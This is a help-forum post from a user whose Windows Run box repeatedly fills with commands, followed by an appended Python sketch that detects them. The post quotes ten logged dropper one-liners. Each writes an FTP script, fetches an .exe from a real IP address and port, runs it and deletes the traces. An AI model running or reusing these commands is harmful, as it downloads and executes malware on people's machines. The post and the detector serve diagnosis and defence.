Hello Experts-
Here is a tasty one... At random intervals the Run window from Start > Run pops up and starts populating with text that tries to download a file from the internet... rather disturbing.
The specifics in the command change over time, but here is what it has been:
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 576.exe >> i &echo quit >> i &ftp -n -s:i &576.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 260.exe >> i &echo quit >> i &ftp -n -s:i &260.exe&del i&exit
cmd.exe /c del i&echo open 75.109.100.153 21077 > i&echo user 1 1 >> i &echo get 252.exe >> i &echo quit >> i &ftp -n -s:i &252.exe&del i&exit
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 362.exe >> i &echo quit >> i &ftp -n -s:i &362.exe&del i&exit
cmd.exe /c del i&echo open 75.109.92.200 10280 > i&echo user 1 1 >> i &echo get 077.exe >> i &echo quit >> i &ftp -n -s:i &077.exe&del i&exit
cmd.exe /c del i&echo open 75.109.100.40 13822 > i&echo user 1 1 >> i &echo get 822.exe >> i &echo quit >> i &ftp -n -s:i &822.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 444.exe >> i &echo quit >> i &ftp -n -s:i &444.exe&del i&exit
cmd.exe /c del i&echo open 75.109.92.200 10280 > i&echo user 1 1 >> i &echo get 016.exe >> i &echo quit >> i &ftp -n -s:i &016.exe&del i&exit
cmd.exe /c del i&echo open 75.109.94.103 1395 > i&echo user 1 1 >> i &echo get 107.exe >> i &echo quit >> i &ftp -n -s:i &107.exe&del i&exit
cmd.exe /c del i&echo open 75.109.91.254 15389 > i&echo user 1 1 >> i &echo get 576.exe >> i &echo quit >> i &ftp -n -s:i &576.exe&del i&exit
To this point none of the attempts have been successful in bringing down a "real" payload, but it is pretty annoying.
I have tried running Symantec AV, Ewido, Sophos rootkit revealer, Sysinternals rootkit revealer, HijackThis, and CCleaner and have not found the culprit.
Any assistance would be appreciated.
Thanks in advance,
t
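
The command lines quoted in the post all share one shape: an FTP script is written with `echo` redirects, passed to `ftp -n -s:`, and the fetched file is then run and the script deleted. As an added example (not part of the original post), this Python sketch flags that shape in process-creation command lines and extracts the host, port and file name; the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Patterns for the command shape quoted in the post: an FTP script is built with
# echo redirects, fed to "ftp -n -s:<script>", and the fetched file is then run.
OPEN_RE = re.compile(r"echo\s+open\s+(\S+)\s+(\d+)\s*>+\s*(\S+?)\s*&", re.I)
GET_RE = re.compile(r"echo\s+get\s+(\S+)\s*>>", re.I)
FTP_RE = re.compile(r"\bftp(?:\.exe)?\s+(?:-\w+\s+)*-s:(\S+?)\s*(?:&|$)", re.I)


def parse_ftp_dropper(cmdline):
    """Return the parsed fields if cmdline has the dropper shape, else None."""
    m_open, m_get, m_ftp = (r.search(cmdline) for r in (OPEN_RE, GET_RE, FTP_RE))
    if not (m_open and m_get and m_ftp):
        return None
    host, port, script = m_open.group(1), int(m_open.group(2)), m_open.group(3)
    if m_ftp.group(1).lower() != script.lower():
        return None  # ftp is not reading the script that was just written
    payload = m_get.group(1)
    # Each '&'-separated step is its own command; look for the payload being run.
    steps = [s.strip().lower() for s in cmdline.split("&")]
    return {
        "host": host, "port": port, "script": script, "payload": payload,
        "executes_payload": payload.lower() in steps,
        "deletes_script": "del " + script.lower() in steps,
    }


def scan(cmdlines):
    """Return (index, fields) for every command line that matches."""
    hits = []
    for i, line in enumerate(cmdlines):
        fields = parse_ftp_dropper(line)
        if fields:
            hits.append((i, fields))
    return hits


# Constructed process-creation command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    "cmd.exe /c del i&echo open 192.0.2.10 2121 > i&echo user 1 1 >> i "
    "&echo get sample.exe >> i &echo quit >> i &ftp -n -s:i &sample.exe&del i&exit",
    "ftp -n -s:nightly_backup.txt",               # scripted FTP, nothing written or run
    "cmd.exe /c echo open 192.0.2.10 21 > a&echo get x.exe >> a&ftp -s:b",  # mismatch
]

if __name__ == "__main__":
    for idx, f in scan(SAMPLE):
        print(idx, f)
```

Run over command lines collected from process-creation logging, a hit with `executes_payload` set also gives the parent process to trace, which is the component that keeps issuing the command.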